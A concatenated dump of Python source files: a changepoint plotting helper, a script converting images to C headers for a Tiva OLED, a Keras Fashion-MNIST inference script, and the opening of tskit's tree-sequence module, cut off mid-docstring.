If set to `None`, all components will be plotted.
Note: seasonality components plotting is not supported currently. ``plot`` parameter must be False.
Returns
-------
fig : `plotly.graph_objs.Figure`
Figure.
"""
if params is None:
params = dict(
observation=True,
observation_original=True,
trend_estimate=True,
trend_change=True,
yearly_seasonality_estimate=True,
adaptive_lasso_estimate=True,
seasonality_change=False, # currently for trend only
seasonality_change_by_component=False,
seasonality_estimate=False,
plot=False)
else:
# currently for trend only
params["seasonality_change"] = False
params["seasonality_estimate"] = False
# need to return the figure object
params["plot"] = False
return self.model_dict["changepoint_detector"].plot(**params)
| 44.77821 | 144 | 0.660801 |
cc3eaf123918973b1b10dca34022c75b57aed02e | 5,598 | py | Python | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | # -------------------------------
# Tiva Image/Animation Generator
# -------------------------------
#
# Generates image/animation header files for use
# with the Tiva TM4c123 and the OrbitBooster Pack
#
# Author: Jos Craw 2020
#
import cv2
import math
import argparse
import numpy as np
from typing import List
IMG_DEFN = """
const char {frame}[] = {lbrace}
{data}
{rbrace};
"""
FRAMES_LIST = """
const char* {iname}_frames[{num}] = {lbrace}
{data}
{rbrace};
"""
H_TEMPLATE = """
/*
* Auto Generated Image H file for Heli Project
*
* Author: Jos Craw 2020
*/
#include <stdint.h>
{data}
uint16_t {iname}_width = {width};
uint16_t {iname}_height = {height};
"""
def gen_h_file(char_array: List, width: int, height: int, image_name: str):
frames = []
frame_num = 0
frame_list = []
for frame in char_array:
frame_data = ""
for line in frame:
data_line = ', '.join(hex_char for hex_char in line)
frame_data += " {},\n".format(data_line)
frame_data = frame_data[:-2]
if len(char_array) == 1:
frame_name = image_name
else:
frame_name = "{}_frame_{}".format(image_name, frame_num)
frame_list.append(" "+frame_name)
frames.append(IMG_DEFN.format(frame=frame_name,
lbrace='{',
rbrace='}',
data=frame_data))
frame_num += 1
h_data = '\n'.join(frame for frame in frames)
if len(char_array) > 1:
frame_list = ",\n".join(frame_name for frame_name in frame_list)
frame_list_h = FRAMES_LIST.format(iname=image_name,
lbrace='{',
rbrace='}',
num=frame_num,
data=frame_list)
h_data += "\n{}".format(frame_list_h)
h_data += "\nuint8_t {}_frame_count = {};".format(image_name, frame_num)
file_data = H_TEMPLATE.format(iname=image_name,
lbrace='{',
rbrace='}',
data=h_data,
width=width,
height=height)
with open('{}.h'.format(image_name), "w+") as h_file:
_ = h_file.write(file_data)
def get_char_array(black_white_img):
height = len(black_white_img)
width = len(black_white_img[0])
char_height = int(math.ceil(height/8.0))
char_width = int(math.ceil(width/8.0))
# print(black_white_img)
split_list = [ black_white_img[i*8:(i+1)*8] for i in range((len(black_white_img) + 7) // 8)]
# print(split_list)
img_transpose = [np.matrix.transpose(array) for array in split_list]
# print(img_transpose)
hex_img = []
for char_line in img_transpose:
hex_line = []
for byte in char_line:
byte = byte[::-1]
binary_string = ''.join(str(char) for char in byte)
hex_line.append('0x{:02x}'.format(int(binary_string, 2)))
hex_img.append(hex_line)
return hex_img
def main():
parser = argparse.ArgumentParser(description='Converts Images to headerfiles to be used to show images and animations on the Tiva Orbit OLED.')
parser.add_argument('-i',
'--invert',
action='store_true',
help='Invert the image colours',
required=False
)
parser.add_argument('-o',
'--output',
action="store",
type=str,
help='Defines the image name',
required=False
)
parser.add_argument('--width',
action="store",
type=int,
help='Define the output image width',
required=False
)
parser.add_argument('--height',
action="store",
type=int,
help='Define the output image height',
required=False
)
parser.add_argument('input', nargs="+", help="List of images to store in output .h file")
args = parser.parse_args()
file_names = args.input
if len(file_names) == 0:
parser.print_help()
exit(1)
if args.output == None:
image_name = file_names[0].split('.')[0].lower() + "_image"
else:
image_name = args.output
hex_files = []
for file_name in file_names:
image = cv2.imread(file_name)
width = 0
height = 0
if args.width != None:
width = args.width
else:
width = image.shape[1]
if args.height != None:
height = args.height
else:
height = image.shape[0]
dim = (width, height)
image = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)
grey_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
(_, black_white_img) = cv2.threshold(grey_img, 127, 255, cv2.THRESH_BINARY)
if args.invert == True:
black_white_img = ~black_white_img
# print(len(black_white_img))
height = len(black_white_img)
width = len(black_white_img[0])
black_white_img = black_white_img / 255
black_white_img = black_white_img.astype('int8')
hex_img = get_char_array(black_white_img)
hex_files.append(hex_img)
gen_h_file(hex_files, width, height, image_name)
if __name__ == "__main__":
main() | 27.307317 | 147 | 0.53662 |
fe49176bae624dde715bda98276b7a8454db086a | 5,489 | py | Python | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | import glob
import os
import re
# next line is to limit tensorflow verbose output
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
CONST_MODEL_PATH = 'trained_models/tf2_model_mnist_fashion_2Dense128x10'
CONST_NEW_IMAGES = 'unseen_test_samples/mnist_fashion_categories'
CONST_IMAGE_SIZE = (28, 28) # MNIST FASHION image sizes
CONST_IMAGE_RESCALE = 1. / 255.0 # Normalisation factor for colors values
class_names = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',
'sandal', 'shirt', 'sneaker', 'bag', 'ankle_boot']
def plot_image(predictions_array, true_label, img):
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_image_label = np.argmax(predictions_array)
if predicted_image_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_image_label.item()],
100 * np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(predictions_array, true_label):
plt.grid(False)
plt.xticks(range(10))
plt.yticks([])
my_plot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
my_plot[predicted_label].set_color('red')
my_plot[true_label].set_color('blue')
_ = plt.xticks(range(10), class_names, rotation=45)
if __name__ == '__main__':
print('# Tensorflow version : {}'.format(tf.__version__))
print('# TensorFlow 2 using a Model to Classify NEW images of clothing')
print('# Loading model already fitted.')
print("### will try to load model from path : {}".format(CONST_MODEL_PATH))
model = load_model(CONST_MODEL_PATH)
print('# MAKE PREDICTIONS :')
print("""
# With the model trained, you can use it to make predictions about some images. The model's linear outputs, logits.
# Attach a softmax layer to convert the logits to probabilities, which are easier to interpret.
# logits definition : https://developers.google.com/machine-learning/glossary#logits
""")
probability_model = tf.keras.Sequential([model, tf.keras.layers.Softmax()])
print("""
# The images from the training set are 28x28 NumPy arrays, with pixel values ranging from 0 to 255.
# The labels are an array of integers, ranging from 0 to 9.
# These correspond to the class of clothing the image represents:""")
print("### Now trying model.predict with a brand new set of images !!")
test_images_path = []
for image_path in glob.glob('{}/*.jpeg'.format(CONST_NEW_IMAGES)):
test_images_path.append(image_path)
test_images_path.sort()
test_images_init = []
test_labels = []
test_filenames = []
for image_path in test_images_path:
test_image = tf.keras.preprocessing.image.load_img(image_path,
color_mode='grayscale',
target_size=CONST_IMAGE_SIZE,
interpolation='nearest')
print('test_image shape : {}'.format(np.shape(test_image)))
# REMEMBER TO 'NORMALIZE' YOUR DATA !
test_image_normalized = np.asarray(test_image) * CONST_IMAGE_RESCALE
print('test_image_normalized shape : {}'.format(np.shape(test_image_normalized)))
test_image_normalized_arr = np.expand_dims(test_image_normalized, 0)
print('test_image_normalized_arr shape : {}'.format(np.shape(test_image_normalized_arr)))
filename = os.path.basename(image_path)
filename_without_ext = os.path.splitext(filename)[0]
image_real_class_name = re.split(r'\d+', filename_without_ext)[0]
try:
image_real_class = class_names.index(image_real_class_name)
predictions_single = probability_model.predict(test_image_normalized_arr)
res = predictions_single[0]
predicted_class = np.argmax(predictions_single)
predicted_class_name = class_names[predicted_class.item()]
print('# prediction for {} is {} = {:10} {:2.2f} percent confidence'.format(
filename, predicted_class, predicted_class_name, (100 * res[predicted_class])))
print(', '.join(['{}: {:2.2f}%'.format(class_names[i], 100 * x) for i, x in enumerate(res)]))
plt.figure(figsize=(6, 3))
plt.subplot(1, 2, 1)
plot_image(res, image_real_class, test_image_normalized)
plt.subplot(1, 2, 2)
plot_value_array(res, image_real_class)
plt.show()
test_labels.append(image_real_class)
test_images_init.append(test_image_normalized)
test_filenames.append(filename)
except ValueError as e:
print('WARNING : Image name {} is not in the MNIST fashion classes'.format(filename))
print('WARNING : Image name {} will not be in the test set !'.format(filename))
print('test_images_init shape : {}'.format(np.shape(test_images_init)))
test_images = np.array(test_images_init)
test_images = test_images / 255.0 # normalize
print('test_images shape : {}'.format(np.shape(test_images)))
| 44.991803 | 121 | 0.651667 |
5d2763f172d75a2bd71360ec35ceb19f173c3a99 | 314,668 | py | Python | python/tskit/trees.py | molpopgen/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | 1 | 2021-08-20T06:59:30.000Z | 2021-08-20T06:59:30.000Z | python/tskit/trees.py | percyfal/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | null | null | null | python/tskit/trees.py | percyfal/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | null | null | null | #
# MIT License
#
# Copyright (c) 2018-2020 Tskit Developers
# Copyright (c) 2015-2018 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Module responsible for managing trees and tree sequences.
"""
import base64
import collections
import concurrent.futures
import functools
import itertools
import math
import textwrap
import warnings
from dataclasses import dataclass
from typing import Any
from typing import Optional
from typing import Union
import numpy as np
import _tskit
import tskit.combinatorics as combinatorics
import tskit.drawing as drawing
import tskit.exceptions as exceptions
import tskit.formats as formats
import tskit.metadata as metadata_module
import tskit.tables as tables
import tskit.util as util
import tskit.vcf as vcf
from tskit import NODE_IS_SAMPLE
from tskit import NULL
from tskit import UNKNOWN_TIME
CoalescenceRecord = collections.namedtuple(
"CoalescenceRecord", ["left", "right", "node", "children", "time", "population"]
)
BaseInterval = collections.namedtuple("BaseInterval", ["left", "right"])
EdgeDiff = collections.namedtuple("EdgeDiff", ["interval", "edges_out", "edges_in"])
class Interval(BaseInterval):
"""
A tuple of 2 numbers, ``[left, right)``, defining an interval over the genome.
:ivar left: The left hand end of the interval. By convention this value is included
in the interval.
:vartype left: float
:ivar right: The right hand end of the iterval. By convention this value is *not*
included in the interval, i.e. the interval is half-open.
:vartype right: float
:ivar span: The span of the genome covered by this interval, simply ``right-left``.
:vartype span: float
"""
@property
def span(self):
return self.right - self.left
@metadata_module.lazy_decode
@dataclass
class Individual(util.Dataclass):
"""
An :ref:`individual <sec_individual_table_definition>` in a tree sequence.
Since nodes correspond to genomes, individuals are associated with a collection
of nodes (e.g., two nodes per diploid). See :ref:`sec_nodes_or_individuals`
for more discussion of this distinction.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["id", "flags", "location", "parents", "nodes", "metadata"]
id: int # noqa A003
"""
The integer ID of this individual. Varies from 0 to
:attr:`TreeSequence.num_individuals` - 1."""
flags: int
"""
The bitwise flags for this individual.
"""
location: np.ndarray
"""
The spatial location of this individual as a numpy array. The location is an empty
array if no spatial location is defined.
"""
parents: np.ndarray
"""
The parent individual ids of this individual as a numpy array. The parents is an
empty array if no parents are defined.
"""
nodes: np.ndarray
"""
The IDs of the nodes that are associated with this individual as
a numpy array (dtype=np.int32). If no nodes are associated with the
individual this array will be empty.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>`
for this individual, decoded if a schema applies.
"""
# Custom eq for the numpy arrays
def __eq__(self, other):
return (
self.id == other.id
and self.flags == other.flags
and np.array_equal(self.location, other.location)
and np.array_equal(self.parents, other.parents)
and np.array_equal(self.nodes, other.nodes)
and self.metadata == other.metadata
)
@metadata_module.lazy_decode
@dataclass
class Node(util.Dataclass):
"""
A :ref:`node <sec_node_table_definition>` in a tree sequence, corresponding
to a single genome. The ``time`` and ``population`` are attributes of the
``Node``, rather than the ``Individual``, as discussed in
:ref:`sec_nodes_or_individuals`.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["id", "flags", "time", "population", "individual", "metadata"]
id: int # noqa A003
"""
The integer ID of this node. Varies from 0 to :attr:`TreeSequence.num_nodes` - 1.
"""
flags: int
"""
The bitwise flags for this node.
"""
time: float
"""
The birth time of this node.
"""
population: int
"""
The integer ID of the population that this node was born in.
"""
individual: int
"""
The integer ID of the individual that this node was a part of.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this node, decoded if a schema
applies.
"""
def is_sample(self):
"""
Returns True if this node is a sample. This value is derived from the
``flag`` variable.
:rtype: bool
"""
return self.flags & NODE_IS_SAMPLE
@metadata_module.lazy_decode
@dataclass
class Edge(util.Dataclass):
"""
An :ref:`edge <sec_edge_table_definition>` in a tree sequence.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["left", "right", "parent", "child", "metadata", "id"]
left: float
"""
The left coordinate of this edge.
"""
right: float
"""
The right coordinate of this edge.
"""
parent: int
"""
The integer ID of the parent node for this edge.
To obtain further information about a node with a given ID, use
:meth:`TreeSequence.node`.
"""
child: int
"""
The integer ID of the child node for this edge.
To obtain further information about a node with a given ID, use
:meth:`TreeSequence.node`.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this edge, decoded if a schema
applies.
"""
id: int # noqa A003
"""
The integer ID of this edge. Varies from 0 to
:attr:`TreeSequence.num_edges` - 1.
"""
# Custom init to define default values with slots
def __init__(self, left, right, parent, child, metadata=b"", id=None): # noqa A003
self.id = id
self.left = left
self.right = right
self.parent = parent
self.child = child
self.metadata = metadata
@property
def span(self):
"""
Returns the span of this edge, i.e. the right position minus the left position
:return: The span of this edge.
:rtype: float
"""
return self.right - self.left
@metadata_module.lazy_decode
@dataclass
class Site(util.Dataclass):
"""
A :ref:`site <sec_site_table_definition>` in a tree sequence.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["id", "position", "ancestral_state", "mutations", "metadata"]
id: int # noqa A003
"""
The integer ID of this site. Varies from 0 to :attr:`TreeSequence.num_sites` - 1.
"""
position: float
"""
The floating point location of this site in genome coordinates.
Ranges from 0 (inclusive) to :attr:`TreeSequence.sequence_length` (exclusive).
"""
ancestral_state: str
"""
The ancestral state at this site (i.e., the state inherited by nodes, unless
mutations occur).
"""
mutations: np.ndarray
"""
The list of mutations at this site. Mutations within a site are returned in the
order they are specified in the underlying :class:`MutationTable`.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this site, decoded if a schema
applies.
"""
# We need a custom eq for the numpy arrays
def __eq__(self, other):
return (
isinstance(other, Site)
and self.id == other.id
and self.position == other.position
and self.ancestral_state == other.ancestral_state
and np.array_equal(self.mutations, other.mutations)
and self.metadata == other.metadata
)
@metadata_module.lazy_decode
@dataclass
class Mutation(util.Dataclass):
"""
A :ref:`mutation <sec_mutation_table_definition>` in a tree sequence.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["id", "site", "node", "derived_state", "parent", "metadata", "time"]
id: int # noqa A003
"""
The integer ID of this mutation. Varies from 0 to
:attr:`TreeSequence.num_mutations` - 1.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
site: int
"""
The integer ID of the site that this mutation occurs at. To obtain
further information about a site with a given ID use :meth:`TreeSequence.site`.
"""
node: int
"""
The integer ID of the first node that inherits this mutation.
To obtain further information about a node with a given ID, use
:meth:`TreeSequence.node`.
"""
derived_state: str
"""
The derived state for this mutation. This is the state
inherited by nodes in the subtree rooted at this mutation's node, unless
another mutation occurs.
"""
parent: int
"""
The integer ID of this mutation's parent mutation. When multiple
mutations occur at a site along a path in the tree, mutations must
record the mutation that is immediately above them. If the mutation does
not have a parent, this is equal to the :data:`NULL` (-1).
To obtain further information about a mutation with a given ID, use
:meth:`TreeSequence.mutation`.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this mutation, decoded if a schema
applies.
"""
time: float
"""
The occurrence time of this mutation.
"""
# To get default values on slots we define a custom init
def __init__(
self,
id=NULL, # noqa A003
site=NULL,
node=NULL,
time=UNKNOWN_TIME,
derived_state=None,
parent=NULL,
metadata=b"",
):
self.id = id
self.site = site
self.node = node
self.time = time
self.derived_state = derived_state
self.parent = parent
self.metadata = metadata
# We need a custom eq to compare unknown times.
def __eq__(self, other):
return (
isinstance(other, Mutation)
and self.id == other.id
and self.site == other.site
and self.node == other.node
and self.derived_state == other.derived_state
and self.parent == other.parent
and self.metadata == other.metadata
and (
self.time == other.time
or (
util.is_unknown_time(self.time) and util.is_unknown_time(other.time)
)
)
)
@metadata_module.lazy_decode
@dataclass
class Migration(util.Dataclass):
"""
A :ref:`migration <sec_migration_table_definition>` in a tree sequence.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["left", "right", "node", "source", "dest", "time", "metadata", "id"]
left: float
"""
The left end of the genomic interval covered by this
migration (inclusive).
"""
right: float
"""
The right end of the genomic interval covered by this migration
(exclusive).
"""
node: int
"""
The integer ID of the node involved in this migration event.
To obtain further information about a node with a given ID, use
:meth:`TreeSequence.node`.
"""
source: int
"""
The source population ID.
"""
dest: int
"""
The destination population ID.
"""
time: float
"""
The time at which this migration occurred at.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this migration, decoded if a schema
applies.
"""
id: int # noqa A003
"""
The integer ID of this mutation. Varies from 0 to
:attr:`TreeSequence.num_mutations` - 1.
"""
@metadata_module.lazy_decode
@dataclass
class Population(util.Dataclass):
"""
A :ref:`population <sec_population_table_definition>` in a tree sequence.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["id", "metadata"]
id: int # noqa A003
"""
The integer ID of this population. Varies from 0 to
:attr:`TreeSequence.num_populations` - 1.
"""
metadata: Optional[Union[bytes, dict]]
"""
The :ref:`metadata <sec_metadata_definition>` for this population, decoded if a
schema applies.
"""
@dataclass
class Variant(util.Dataclass):
"""
A variant represents the observed variation among samples
for a given site. A variant consists (a) of a reference to the
:class:`Site` instance in question; (b) the **alleles** that may be
observed at the samples for this site; and (c) the **genotypes**
mapping sample IDs to the observed alleles.
Each element in the ``alleles`` tuple is a string, representing the
actual observed state for a given sample. The ``alleles`` tuple is
generated in one of two ways. The first (and default) way is for
``tskit`` to generate the encoding on the fly as alleles are encountered
while generating genotypes. In this case, the first element of this
tuple is guaranteed to be the same as the site's ``ancestral_state`` value
and the list of alleles is also guaranteed not to contain any duplicates.
Note that allelic values may be listed that are not referred to by any
samples. For example, if we have a site that is fixed for the derived state
(i.e., we have a mutation over the tree root), all genotypes will be 1, but
the alleles list will be equal to ``('0', '1')``. Other than the
ancestral state being the first allele, the alleles are listed in
no particular order, and the ordering should not be relied upon
(but see the notes on missing data below).
The second way is for the user to define the mapping between
genotype values and allelic state strings using the
``alleles`` parameter to the :meth:`TreeSequence.variants` method.
In this case, there is no indication of which allele is the ancestral state,
as the ordering is determined by the user.
The ``genotypes`` represent the observed allelic states for each sample,
such that ``var.alleles[var.genotypes[j]]`` gives the string allele
for sample ID ``j``. Thus, the elements of the genotypes array are
indexes into the ``alleles`` list. The genotypes are provided in this
way via a numpy array to enable efficient calculations.
When :ref:`missing data<sec_data_model_missing_data>` is present at a given
site boolean flag ``has_missing_data`` will be True, at least one element
of the ``genotypes`` array will be equal to ``tskit.MISSING_DATA``, and the
last element of the ``alleles`` array will be ``None``. Note that in this
case ``variant.num_alleles`` will **not** be equal to
``len(variant.alleles)``. The rationale for adding ``None`` to the end of
the ``alleles`` list is to help code that does not handle missing data
correctly fail early rather than introducing subtle and hard-to-find bugs.
As ``tskit.MISSING_DATA`` is equal to -1, code that decodes genotypes into
allelic values without taking missing data into account would otherwise
output the last allele in the list rather missing data.
Modifying the attributes in this class will have **no effect** on the
underlying tree sequence data.
"""
__slots__ = ["site", "alleles", "genotypes"]
site: Site
"""
The site object for this variant.
"""
alleles: tuple
"""
A tuple of the allelic values that may be observed at the
samples at the current site. The first element of this tuple is always
the site's ancestral state.
"""
genotypes: np.ndarray
"""
An array of indexes into the list ``alleles``, giving the
state of each sample at the current site.
"""
@property
def has_missing_data(self):
"""
True if there is missing data for any of the
samples at the current site.
"""
return self.alleles[-1] is None
@property
def num_alleles(self):
"""
The number of distinct alleles at this site. Note that
this may be greater than the number of distinct values in the genotypes
array.
"""
return len(self.alleles) - self.has_missing_data
# Deprecated alias to avoid breaking existing code.
@property
def position(self):
return self.site.position
# Deprecated alias to avoid breaking existing code.
@property
def index(self):
return self.site.id
# We need a custom eq for the numpy array
def __eq__(self, other):
return (
isinstance(other, Variant)
and self.site == other.site
and self.alleles == other.alleles
and np.array_equal(self.genotypes, other.genotypes)
)
@dataclass
class Edgeset(util.Dataclass):
__slots__ = ["left", "right", "parent", "children"]
left: int
right: int
parent: int
children: np.ndarray
# We need a custom eq for the numpy array
def __eq__(self, other):
return (
isinstance(other, Edgeset)
and self.left == other.left
and self.right == other.right
and self.parent == other.parent
and np.array_equal(self.children, other.children)
)
@dataclass
class Provenance(util.Dataclass):
__slots__ = ["id", "timestamp", "record"]
id: int # noqa A003
timestamp: str
record: str
class Tree:
"""
A single tree in a :class:`TreeSequence`. Please see the
:ref:`sec_tutorial_moving_along_a_tree_sequence` section for information
on how efficiently access trees sequentially or obtain a list
of individual trees in a tree sequence.
The ``sample_lists`` parameter controls the features that are enabled
for this tree. If ``sample_lists`` is True a more efficient algorithm is
used in the :meth:`Tree.samples` method.
The ``tracked_samples`` parameter can be used to efficiently count the
number of samples in a given set that exist in a particular subtree
using the :meth:`Tree.num_tracked_samples` method.
The :class:`Tree` class is a state-machine which has a state
corresponding to each of the trees in the parent tree sequence. We
transition between these states by using the seek functions like
:meth:`Tree.first`, :meth:`Tree.last`, :meth:`Tree.seek` and
:meth:`Tree.seek_index`. There is one more state, the so-called "null"
or "cleared" state. This is the state that a :class:`Tree` is in
immediately after initialisation; it has an index of -1, and no edges. We
can also enter the null state by calling :meth:`Tree.next` on the last
tree in a sequence, calling :meth:`Tree.prev` on the first tree in a
sequence or calling calling the :meth:`Tree.clear` method at any time.
The high-level TreeSequence seeking and iterations methods (e.g,
:meth:`TreeSequence.trees`) are built on these low-level state-machine
seek operations. We recommend these higher level operations for most
users.
:param TreeSequence tree_sequence: The parent tree sequence.
:param list tracked_samples: The list of samples to be tracked and
counted using the :meth:`Tree.num_tracked_samples` method.
:param bool sample_lists: If True, provide more efficient access
to the samples beneath a give node using the
:meth:`Tree.samples` method.
:param int root_threshold: The minimum number of samples that a node
must be ancestral to for it to be in the list of roots. By default
this is 1, so that isolated samples (representing missing data)
are roots. To efficiently restrict the roots of the tree to
those subtending meaningful topology, set this to 2. This value
is only relevant when trees have multiple roots.
:param bool sample_counts: Deprecated since 0.2.4.
"""
def __init__(
self,
tree_sequence,
tracked_samples=None,
*,
sample_lists=False,
root_threshold=1,
sample_counts=None,
):
options = 0
if sample_counts is not None:
warnings.warn(
"The sample_counts option is not supported since 0.2.4 "
"and is ignored",
RuntimeWarning,
)
if sample_lists:
options |= _tskit.SAMPLE_LISTS
kwargs = {"options": options}
if tracked_samples is not None:
# TODO remove this when we allow numpy arrays in the low-level API.
kwargs["tracked_samples"] = list(tracked_samples)
self._tree_sequence = tree_sequence
self._ll_tree = _tskit.Tree(tree_sequence.ll_tree_sequence, **kwargs)
self._ll_tree.set_root_threshold(root_threshold)
self._make_arrays()
def copy(self):
"""
Returns a deep copy of this tree. The returned tree will have identical state
to this tree.
:return: A copy of this tree.
:rtype: Tree
"""
copy = type(self).__new__(type(self))
copy._tree_sequence = self._tree_sequence
copy._ll_tree = self._ll_tree.copy()
copy._make_arrays()
return copy
def _make_arrays(self):
# Store the low-level arrays for efficiency. There's no real overhead
# in this, because the refer to the same underlying memory as the
# tree object.
self._parent_array = self._ll_tree.parent_array
self._left_child_array = self._ll_tree.left_child_array
self._right_child_array = self._ll_tree.right_child_array
self._left_sib_array = self._ll_tree.left_sib_array
self._right_sib_array = self._ll_tree.right_sib_array
@property
def tree_sequence(self):
"""
Returns the tree sequence that this tree is from.
:return: The parent tree sequence for this tree.
:rtype: :class:`TreeSequence`
"""
return self._tree_sequence
@property
def root_threshold(self):
"""
Returns the minimum number of samples that a node must be an ancestor
of to be considered a potential root.
:return: The root threshold.
:rtype: :class:`TreeSequence`
"""
return self._ll_tree.get_root_threshold()
def __eq__(self, other):
ret = False
if type(other) is type(self):
ret = bool(self._ll_tree.equals(other._ll_tree))
return ret
def __ne__(self, other):
return not self.__eq__(other)
def first(self):
"""
Seeks to the first tree in the sequence. This can be called whether
the tree is in the null state or not.
"""
self._ll_tree.first()
def last(self):
"""
Seeks to the last tree in the sequence. This can be called whether
the tree is in the null state or not.
"""
self._ll_tree.last()
def next(self): # noqa A002
"""
Seeks to the next tree in the sequence. If the tree is in the initial
null state we seek to the first tree (equivalent to calling :meth:`.first`).
Calling ``next`` on the last tree in the sequence results in the tree
being cleared back into the null initial state (equivalent to calling
:meth:`clear`). The return value of the function indicates whether the
tree is in a non-null state, and can be used to loop over the trees::
# Iterate over the trees from left-to-right
tree = tskit.Tree(tree_sequence)
while tree.next()
# Do something with the tree.
print(tree.index)
# tree is now back in the null state.
:return: True if the tree has been transformed into one of the trees
in the sequence; False if the tree has been transformed into the
null state.
:rtype: bool
"""
return bool(self._ll_tree.next())
def prev(self):
"""
Seeks to the previous tree in the sequence. If the tree is in the initial
null state we seek to the last tree (equivalent to calling :meth:`.last`).
Calling ``prev`` on the first tree in the sequence results in the tree
being cleared back into the null initial state (equivalent to calling
:meth:`clear`). The return value of the function indicates whether the
tree is in a non-null state, and can be used to loop over the trees::
# Iterate over the trees from right-to-left
tree = tskit.Tree(tree_sequence)
while tree.prev()
# Do something with the tree.
print(tree.index)
# tree is now back in the null state.
:return: True if the tree has been transformed into one of the trees
in the sequence; False if the tree has been transformed into the
null state.
:rtype: bool
"""
return bool(self._ll_tree.prev())
def clear(self):
"""
Resets this tree back to the initial null state. Calling this method
on a tree already in the null state has no effect.
"""
self._ll_tree.clear()
def seek_index(self, index):
"""
Sets the state to represent the tree at the specified
index in the parent tree sequence. Negative indexes following the
standard Python conventions are allowed, i.e., ``index=-1`` will
seek to the last tree in the sequence.
:param int index: The tree index to seek to.
:raises IndexError: If an index outside the acceptable range is provided.
"""
num_trees = self.tree_sequence.num_trees
if index < 0:
index += num_trees
if index < 0 or index >= num_trees:
raise IndexError("Index out of bounds")
# This should be implemented in C efficiently using the indexes.
# No point in complicating the current implementation by trying
# to seek from the correct direction.
self.first()
while self.index != index:
self.next()
def seek(self, position):
"""
Sets the state to represent the tree that covers the specified
position in the parent tree sequence. After a successful return
of this method we have ``tree.interval.left`` <= ``position``
< ``tree.interval.right``.
:param float position: The position along the sequence length to
seek to.
:raises ValueError: If 0 < position or position >=
:attr:`TreeSequence.sequence_length`.
"""
if position < 0 or position >= self.tree_sequence.sequence_length:
raise ValueError("Position out of bounds")
# This should be implemented in C efficiently using the indexes.
# No point in complicating the current implementation by trying
# to seek from the correct direction.
self.first()
while self.interval.right <= position:
self.next()
def rank(self):
"""
Produce the rank of this tree in the enumeration of all leaf-labelled
trees of n leaves. See the :ref:`sec_tree_ranks` section for
details on ranking and unranking trees.
:rtype: tuple(int)
:raises ValueError: If the tree has multiple roots.
"""
return combinatorics.RankTree.from_tsk_tree(self).rank()
@staticmethod
def unrank(num_leaves, rank, *, span=1, branch_length=1):
"""
Reconstruct the tree of the given ``rank``
